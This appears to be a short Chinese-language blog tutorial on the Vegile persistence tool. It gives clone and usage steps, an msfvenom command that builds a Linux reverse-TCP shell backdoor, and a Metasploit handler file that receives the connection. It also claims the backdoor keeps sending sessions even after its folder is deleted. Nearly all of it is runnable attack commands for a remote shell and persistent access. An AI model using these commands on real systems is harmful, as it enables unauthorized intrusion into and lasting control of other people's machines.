enter description here

视频演示

1
2
3
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile

enter description here
 

Vegile帮助参数

1
2
3
Vegile -i / --inject [backdoor/rootkit]  (注入)
Vegile -u / --unlimited [backdoor/rootkit] (无数次)
Vegile -h / --help

1.首先生成linux 木马

1
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR

enter description here

2.建立监听

handler.rc

1
2
3
4
use exploit/multi/handler
set PAYLOAD linux/x86/shell/reverse_tcp
set LHOST 192.168.1.100
run

enter description here

1
msfconsole -r handler.rc 

enter description here
得到一次会话
enter description here

得到会话

并无限制的发送会话
enter description here
包括把整个文件夹删除 还在 无限制的发送会话
enter description here